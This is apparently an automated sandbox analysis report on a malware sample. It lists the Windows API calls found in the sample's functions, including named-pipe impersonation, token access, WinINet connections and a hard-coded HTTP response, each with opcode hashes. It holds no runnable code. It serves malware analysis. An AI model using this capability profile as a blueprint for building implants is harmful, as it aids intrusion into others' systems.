                • String ID:
                • API String ID: 2416742903-0
                • Opcode ID: d39206b21eda18042a21def0aae61064133e79866cd27e778fe3c13849b8ffb1
                • Instruction ID: 6a02c43536547dd8f7c5e8d4e58138dcdb118a72bb72a042f3ee0b2776571d99
                • Opcode Fuzzy Hash: d39206b21eda18042a21def0aae61064133e79866cd27e778fe3c13849b8ffb1
                • Instruction Fuzzy Hash: C24181A6314B41C6EB64DBA6E84076FA364FB88B88F045466AE89C7B48EF38C1458701
                APIs
                • _errno.LIBCMT ref: 0349D1BD
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • _invalid_parameter_noinfo.LIBCMT ref: 0349D1C9
                • __crtIsPackagedApp.LIBCMT ref: 0349D1DA
                • _dosmaperr.LIBCMT ref: 0349D224
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 2917016420-0
                • Opcode ID: 618a4255488f53f113d74fa2bceb050b7581b57bf5715da974d6dc59db4e5fbf
                • Instruction ID: 5a4577d8e86c04d97c34b6a4ebf2272be4dae9f5048812b4b24663ea56c6ed63
                • Opcode Fuzzy Hash: 618a4255488f53f113d74fa2bceb050b7581b57bf5715da974d6dc59db4e5fbf
                • Instruction Fuzzy Hash: B231E330A18B094FFF48EF6D98453297BD1FB89325F04465FA44ACF2A0DB38C8418746
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
                • String ID:
                • API String ID: 4120058822-0
                • Opcode ID: 479da2c5f7565818e68d8e53e938d4df86e4340f370b51f2ddc53d5decdb60f2
                • Instruction ID: f39c8527d29e4d218389df21c9b7a7bc4e89360400e58c933c9bf9121f38124d
                • Opcode Fuzzy Hash: 479da2c5f7565818e68d8e53e938d4df86e4340f370b51f2ddc53d5decdb60f2
                • Instruction Fuzzy Hash: 6E212331B08F015EE734EFEDA89022E7E84EB94211F05016FD416CF2D1DAB559428799
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$OpenProcessToken
                • String ID:
                • API String ID: 2009710997-0
                • Opcode ID: c45598522d1ef4c26f254913e2d744c8b6dd039168d3660f363170ff2796bb64
                • Instruction ID: b3a5a501c1a979b8283c47259ab819632ede6fb51c944c5c5f68ee712b1fa77f
                • Opcode Fuzzy Hash: c45598522d1ef4c26f254913e2d744c8b6dd039168d3660f363170ff2796bb64
                • Instruction Fuzzy Hash: 3321F42530470183FF11EBB6E45471BA7A4ABC8B94F1840A9AE4AC7764DF3DC446C741
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 038ADAC4
                  • Part of subcall function 0389F454: _getptd.LIBCMT ref: 0389F46A
                  • Part of subcall function 0389F454: __updatetlocinfo.LIBCMT ref: 0389F49F
                  • Part of subcall function 0389F454: __updatetmbcinfo.LIBCMT ref: 0389F4C6
                • _errno.LIBCMT ref: 038ADADF
                • _invalid_parameter_noinfo.LIBCMT ref: 038ADAEA
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                • String ID:
                • API String ID: 3191669884-0
                • Opcode ID: 1a3c1f90b9e0765be7a3ca57c2f6cc359d18deb9d03ea8ab1d8e9cb83ec138c3
                • Instruction ID: 510774168901aed38951da954a2c56cb0e4d369378b70188cf1147273afa68eb
                • Opcode Fuzzy Hash: 1a3c1f90b9e0765be7a3ca57c2f6cc359d18deb9d03ea8ab1d8e9cb83ec138c3
                • Instruction Fuzzy Hash: 6A218D76304B848AEB10DF9DD49065AB6A5F744FE4F5881A6EF58CBF84CB74C946C700
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CountTickioctlsocket
                • String ID:
                • API String ID: 3686034022-0
                • Opcode ID: df8b12fdec247861816a65c7895da2fd6f05e4dcf0f4f0871b067a3fd8febfec
                • Instruction ID: 880a8659819dc44a41fde9639aea1e94c3d5a380d75ca09b9e7a82b4da8fe682
                • Opcode Fuzzy Hash: df8b12fdec247861816a65c7895da2fd6f05e4dcf0f4f0871b067a3fd8febfec
                • Instruction Fuzzy Hash: F1110A7120074586FB21CBA7E84435AF324E784BA4F584161E959C3AA4CF78C98AC704
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken
                • String ID:
                • API String ID: 4232080776-0
                • Opcode ID: 63d816b5d70ed7ced87649dbe768fda66f973ffc67f04252ce0421f3c604c356
                • Instruction ID: 84742bca4bb2262d7f8073f0cc8b032f4411b0c379aa6e18d2bf8d974f40363e
                • Opcode Fuzzy Hash: 63d816b5d70ed7ced87649dbe768fda66f973ffc67f04252ce0421f3c604c356
                • Instruction Fuzzy Hash: 0A11E761324749C2FB62EB61F84476AB328FB80B85F888591A6CA86565CF3CC208D720
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                • String ID:
                • API String ID: 2328795619-0
                • Opcode ID: 40b1f2a6e128636b5ea54999467d5c7a08cd77d7087e23116c772b60f44d2d31
                • Instruction ID: dd123e336e8a38fff5a11d9b17a833218acf4e294c6530a98f24d162c3d08ae0
                • Opcode Fuzzy Hash: 40b1f2a6e128636b5ea54999467d5c7a08cd77d7087e23116c772b60f44d2d31
                • Instruction Fuzzy Hash: EC51487171575082BF18CAEA990066ABE90B794BF8F1C47579E79C7BD4CB34E091C740
                APIs
                • _mtinitlocknum.LIBCMT ref: 038A8235
                  • Part of subcall function 038A1D0C: _FF_MSGBANNER.LIBCMT ref: 038A1D29
                  • Part of subcall function 038A1D0C: _NMSG_WRITE.LIBCMT ref: 038A1D33
                • InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 038A82B8
                • EnterCriticalSection.KERNEL32 ref: 038A82D4
                • LeaveCriticalSection.KERNEL32 ref: 038A82E4
                • _calloc_crt.LIBCMT ref: 038A835A
                • __lock_fhandle.LIBCMT ref: 038A83C2
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CriticalSection$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
                • String ID:
                • API String ID: 445582508-0
                • Opcode ID: cb94c47234e7318eaf63806fd4c7d2241f139b70922057cc91e94235dbb42d3c
                • Instruction ID: efe1f26d992252dbba9eec0a0b23fcdfd192efc33da0095dd9fae612cf151f22
                • Opcode Fuzzy Hash: cb94c47234e7318eaf63806fd4c7d2241f139b70922057cc91e94235dbb42d3c
                • Instruction Fuzzy Hash: AF512672610F8482EB10DF68D44432EBBA9FB84B58F499599DE4E877A0DF78C952C720
                APIs
                  • Part of subcall function 0389473C: malloc.LIBCMT ref: 03894758
                  • Part of subcall function 0389E560: _errno.LIBCMT ref: 0389E4B7
                  • Part of subcall function 0389E560: _invalid_parameter_noinfo.LIBCMT ref: 0389E4C2
                • fseek.LIBCMT ref: 03890A28
                  • Part of subcall function 0389EDE4: _errno.LIBCMT ref: 0389EE0C
                  • Part of subcall function 0389EDE4: _invalid_parameter_noinfo.LIBCMT ref: 0389EE17
                • _ftelli64.LIBCMT ref: 03890A30
                  • Part of subcall function 0389EE58: _errno.LIBCMT ref: 0389EE76
                  • Part of subcall function 0389EE58: _invalid_parameter_noinfo.LIBCMT ref: 0389EE81
                • fseek.LIBCMT ref: 03890A40
                  • Part of subcall function 0389EDE4: _fseek_nolock.LIBCMT ref: 0389EE35
                • GetFullPathNameA.KERNEL32 ref: 03890A63
                • malloc.LIBCMT ref: 03890A80
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                  • Part of subcall function 0388CFCC: malloc.LIBCMT ref: 0388CFDF
                  • Part of subcall function 0388CFFC: htonl.WS2_32 ref: 0388D007
                • fclose.LIBCMT ref: 03890B3D
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
                • String ID:
                • API String ID: 3587854850-0
                • Opcode ID: a569d82a0c52b606fced7d3ca32dedd0a036ca5e6a97fc9ef12d49b38375e880
                • Instruction ID: ee5e461f1e3281a2a90069f7bcc343bc8ca0234ba8b3a017565d5c75b16919da
                • Opcode Fuzzy Hash: a569d82a0c52b606fced7d3ca32dedd0a036ca5e6a97fc9ef12d49b38375e880
                • Instruction Fuzzy Hash: 0041E42631479082EF10EB9AE45432EA755F7C8BD4F8881A6DE5E9BB98DF3CC506C701
                APIs
                • GetACP.KERNEL32 ref: 038943C8
                • GetOEMCP.KERNEL32 ref: 038943D2
                • GetCurrentProcessId.KERNEL32 ref: 038943F8
                • GetTickCount.KERNEL32 ref: 03894400
                  • Part of subcall function 0389E38C: _getptd.LIBCMT ref: 0389E394
                • GetCurrentProcess.KERNEL32 ref: 0389443C
                  • Part of subcall function 0388FF70: GetModuleHandleA.KERNEL32 ref: 0388FF85
                  • Part of subcall function 0388FF70: GetProcAddress.KERNEL32 ref: 0388FF95
                • GetCurrentProcessId.KERNEL32 ref: 038944AE
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
                • String ID:
                • API String ID: 3426420785-0
                • Opcode ID: b6fc155a55da666bb393d8027138b05ac493bc84460806fdbb4add4f73d2445a
                • Instruction ID: 766ff62151448f1cd38b0f41b4fbefdba1be94509fb16b796ede3b154f40991a
                • Opcode Fuzzy Hash: b6fc155a55da666bb393d8027138b05ac493bc84460806fdbb4add4f73d2445a
                • Instruction Fuzzy Hash: 4441D466710711A6FF01FBFAD85079D63A4BF88794F444496DE09DBAA8EF38C20AC701
                APIs
                  • Part of subcall function 0389C09C: RevertToSelf.ADVAPI32 ref: 0389C0AA
                • InternetOpenA.WININET ref: 0388E7E1
                • InternetSetOptionA.WININET ref: 0388E801
                • InternetSetOptionA.WININET ref: 0388E819
                • InternetConnectA.WININET ref: 0388E84F
                • InternetSetOptionA.WININET ref: 0388E88C
                • InternetSetOptionA.WININET ref: 0388E8B7
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: Internet$Option$ConnectOpenRevertSelf
                • String ID:
                • API String ID: 1513466045-0
                • Opcode ID: dad49d787d011debb01431b698db0f5525ed4c0c9550348a44d35d6a50f0dafd
                • Instruction ID: 6d3d17f3457ece2732f47aa7d506daf9ac671e9decd8f85f7acdaefe4146589c
                • Opcode Fuzzy Hash: dad49d787d011debb01431b698db0f5525ed4c0c9550348a44d35d6a50f0dafd
                • Instruction Fuzzy Hash: 7F41137571078182EF24EF95E480B69B7A5F788B84F0890AADA499BF64EF3CD601C700
                APIs
                • malloc.LIBCMT ref: 038955E6
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                • htonl.WS2_32 ref: 03895619
                • recvfrom.WS2_32 ref: 0389565D
                • WSAGetLastError.WS2_32 ref: 0389566A
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
                • String ID:
                • API String ID: 2310505145-0
                • Opcode ID: 018ee31d047f13e18eb2acc08179a8f443975026078621be6262547f92683203
                • Instruction ID: ea85e8ca9e38aa1fa77d5e741dc63d9c738110ef49445d96f592e1f19de6bc98
                • Opcode Fuzzy Hash: 018ee31d047f13e18eb2acc08179a8f443975026078621be6262547f92683203
                • Instruction Fuzzy Hash: 0A419875314741C6EF12CF65E88071AB7A9F789BA8F1C8596EA4987B64DF38C541CF00
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                • String ID:
                • API String ID: 1547050394-0
                • Opcode ID: 2ee4da16ff171bafb35c0bb8db8b3dd677d1343b8b4ea0f09adf6440b25ff7f8
                • Instruction ID: 1719100aa1e7b469b6c7b40fbbb644472bbc04fe5b5d31a0c64d30b7f50a9f8a
                • Opcode Fuzzy Hash: 2ee4da16ff171bafb35c0bb8db8b3dd677d1343b8b4ea0f09adf6440b25ff7f8
                • Instruction Fuzzy Hash: BC21D434A18B094FFB95FF3D980432A7AD5EB9A210F05056F9449CF220EF74CC42878A
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                • String ID:
                • API String ID: 1547050394-0
                • Opcode ID: b28fd23009c431afd31368ed49de371f4cc8ea00af4fe5c0ad9afbaa5be06d71
                • Instruction ID: 28ab2a3d184e456d38c8c7ae9c0fac262690b0fd63dc550b58ca8b82eb79e649
                • Opcode Fuzzy Hash: b28fd23009c431afd31368ed49de371f4cc8ea00af4fe5c0ad9afbaa5be06d71
                • Instruction Fuzzy Hash: 7711D365314B8685FF11DFEAAC0031EAB95BB84BC0F4C48A29E89CBB18EF7CD1118701
                APIs
                • malloc.LIBCMT ref: 0388F8BD
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                • free.LIBCMT ref: 0388F8F8
                • fwrite.LIBCMT ref: 0388F939
                • fclose.LIBCMT ref: 0388F941
                • free.LIBCMT ref: 0388F94E
                  • Part of subcall function 0389D188: HeapFree.KERNEL32 ref: 0389D19E
                  • Part of subcall function 0389D188: _errno.LIBCMT ref: 0389D1A8
                  • Part of subcall function 0389D188: GetLastError.KERNEL32 ref: 0389D1B0
                • GetLastError.KERNEL32 ref: 0388F953
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
                • String ID:
                • API String ID: 1616846154-0
                • Opcode ID: 55f7a226863731569709ab65466cf2251e8dcd047762f84c6fb73987460c01ea
                • Instruction ID: 4706f696dad45811d587bcb19559b41f716217089fcb977c33825f3cbe217f5f
                • Opcode Fuzzy Hash: 55f7a226863731569709ab65466cf2251e8dcd047762f84c6fb73987460c01ea
                • Instruction Fuzzy Hash: F411C81530478051EE10F7A6B45426EA351EBC6FE4F8C46A2DF5D9FB88DF2CC1068741
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleStateWait
                • String ID:
                • API String ID: 3798860377-0
                • Opcode ID: 72c7b950336cc460e27c7b46ba728849a6f7e565e48342ed7c09114a024cd772
                • Instruction ID: ab78a8cea03d1be5831d3aa15ff9e56ac774e5d39b7d131e6929db5d597250d0
                • Opcode Fuzzy Hash: 72c7b950336cc460e27c7b46ba728849a6f7e565e48342ed7c09114a024cd772
                • Instruction Fuzzy Hash: 0811017222475983FF10CB65E44872EB364F788BE8F088691EA6A87A98CF7CC445C701
                APIs
                • malloc.LIBCMT ref: 0389CF93
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                • malloc.LIBCMT ref: 0389CFA1
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D25C
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D261
                • malloc.LIBCMT ref: 0389CFC3
                • _snprintf.LIBCMT ref: 0389CFDE
                  • Part of subcall function 0389D57C: _errno.LIBCMT ref: 0389D5B3
                  • Part of subcall function 0389D57C: _invalid_parameter_noinfo.LIBCMT ref: 0389D5BE
                • malloc.LIBCMT ref: 0389CFF9
                Strings
                • HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 0389CFC8
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
                • String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
                • API String ID: 3518644649-2739389480
                • Opcode ID: 905fd91b734610568c183788fb82b77138f36b50e46a72f9438916841788d806
                • Instruction ID: da2af4dff07826c43cb8ab2c475adb497fd2ec0614a37982dd57f95f3087e88b
                • Opcode Fuzzy Hash: 905fd91b734610568c183788fb82b77138f36b50e46a72f9438916841788d806
                • Instruction Fuzzy Hash: A401D63670179041EA04DB56B84461DA699F789FE0F58425BEF699B7C4CF38C0428744
                APIs
                • malloc.LIBCMT ref: 03483604
                  • Part of subcall function 0349C60F: _FF_MSGBANNER.LIBCMT ref: 0349C63F
                  • Part of subcall function 0349C60F: _NMSG_WRITE.LIBCMT ref: 0349C649
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C67D
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C688
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C693
                • malloc.LIBCMT ref: 0348360F
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C6A3
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C6A8
                • free.LIBCMT ref: 034836F6
                • free.LIBCMT ref: 034836FE
                • free.LIBCMT ref: 03483706
                • free.LIBCMT ref: 03483712
                • free.LIBCMT ref: 0348371F
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_callnewhmalloc
                • String ID:
                • API String ID: 2761444284-0
                • Opcode ID: 5e3b48a2261c00200ba73531dd32d36e90c95496b5af35af7ab5b67e4a0c521d
                • Instruction ID: 141a1d0a74c781ea919c9e5dfbc636c66538fdf76311e87d075163f0841e30f6
                • Opcode Fuzzy Hash: 5e3b48a2261c00200ba73531dd32d36e90c95496b5af35af7ab5b67e4a0c521d
                • Instruction Fuzzy Hash: 5041D138718F494FDB69EF2D949057E77D4FB49600750416ED84BCB312EE20EC5286CA
                APIs
                • malloc.LIBCMT ref: 038841BD
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                • malloc.LIBCMT ref: 038841C8
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D25C
